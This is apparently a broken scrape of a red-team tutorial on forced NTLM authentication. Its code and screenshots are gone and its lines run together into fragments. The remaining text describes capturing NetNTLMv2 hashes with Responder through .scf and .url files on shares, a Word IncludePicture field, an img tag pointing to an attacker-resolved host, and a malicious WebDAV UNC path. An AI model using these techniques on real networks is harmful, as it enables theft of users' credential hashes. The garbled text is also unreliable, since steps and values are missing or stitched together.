responder
will be listening on port 445:Responder
on our kali box:NetNTLMv2
hash is captured:fa.scf
file on the attacker controlled machine at 10.0.0.7
in a shared folder tools
low
opens the share \\10.0.0.7\tools
and the fa.scf
gets executed automatically, which in turn forces the victim system to attempt to authenticate to the attacking system at 10.0.0.5 where responder is listening:.scf
attack is that the file could easily be downloaded through the browser and as soon as the user navigates to the Downloads
folder, users's hash is stolen:link.url
file is placed, the OS tries to authenticate to the attacker's malicious SMB listener on 10.0.0.5
where NetNTLMv2 hash is captured:IncludePicture
:offense.local
, you have a foothold in, and point it to your external server, say 1.1.1.1
Responder
and listen for HTTP connections on port 80<img src="http://vpn.offense.local"/>
http://vpn.offense.local
resolves to 1.1.1.1
(where your Responder is listening on port 80), but only from inside the offense.local
domainoffense.local
domainhttp://vpn.offense.local
, which resolves to http://1.1.1.1
(where Responder is litening on port 80)spotless
when they are forced to authenticate to the malicious webdav when ls \\[email protected]\spotless.png
is executed:spotless
via a shortcut icon that points to our malicious webdav at \\[email protected]\spotless.png
: